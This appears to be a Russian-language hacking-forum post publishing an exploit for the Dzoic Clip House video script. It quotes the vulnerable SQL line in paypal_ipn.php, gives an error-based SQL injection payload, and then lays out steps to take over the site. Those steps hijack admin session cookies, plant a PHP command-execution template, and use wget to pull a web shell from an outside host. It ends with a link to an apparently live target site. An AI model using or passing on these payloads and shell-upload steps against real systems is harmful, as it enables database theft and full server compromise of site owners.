PDA

Просмотр полной версии : Dzoic Clip House


MaSTeR GэN
15.01.2013, 11:44
Dzoic Clip House exploit

URL производителя : http://dzoic.com/

DEMO: http://www.cliphousedemo.com/

Error based sql inj

CODE(/psystems/paypal/paypal_ipn.php):


else{



$sql_query="DELETE FROM payment_gateway WHERE order_id=".$paypal->ipn_data['custom'];

$GLOBALS["DB"]->execute($sql_query);

exploit:


http://www.test.com/psystems/paypal/paypal_ipn.php

post:

custom=1and1=(select 1 from(select count(*),con cat(version(),floor(rand(0)*2))x from informatio n_schema.tables group by x)a)



Заливка шелла:

1.Если не подобрался админ пасс дергаем админ сессию куки:

mem_id:100000

password:хеш_пароля из бд

sess_id:ид сессии из базы

2.Лезим в редактирование шаблонов "http://test.com/administrator/index.php?section=composer"

3.Создаем новую страницу и туда пихаем


{php}

system($_POST[cmd]);

{/php}



4.Заливаем нормальный шелл :

http://test.com/index.php

post:


page=page_name&cmd=wget-O./uploader/tmp/swf.php http://url.com/shell.txt



5.Юзаем полноценный шелл по адреcу http://test.com/uploader/tmp/swf.php

TEST LINK:http://vidiload.com/